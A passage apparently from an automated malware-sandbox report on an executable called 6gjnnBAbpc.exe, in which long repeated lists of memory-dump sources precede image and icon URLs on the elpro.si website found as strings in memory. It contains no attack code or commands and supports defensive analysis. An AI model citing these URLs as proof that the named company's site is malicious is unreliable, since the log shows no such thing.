00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/elpro_laboratorij_120x60.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/elpro_lepenik_120x60.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/handheld_120x50-1.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/preloader.gif)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/06/wika.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2021/01/rotronic_2_120x50.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/03/jola_2_200x100.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/12/wika-14-100x100.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/12/wika-14-150x150.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/12/wika-14-300x300.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/12/wika-19-100x100.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 